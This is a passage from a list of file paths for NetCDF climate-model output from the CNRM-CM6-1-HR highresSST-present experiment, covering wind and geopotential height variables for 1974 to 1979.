'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601-197612.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701-197712.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401-197412.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501-197512.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801-197812.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901-197912.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197612312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197712312359.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
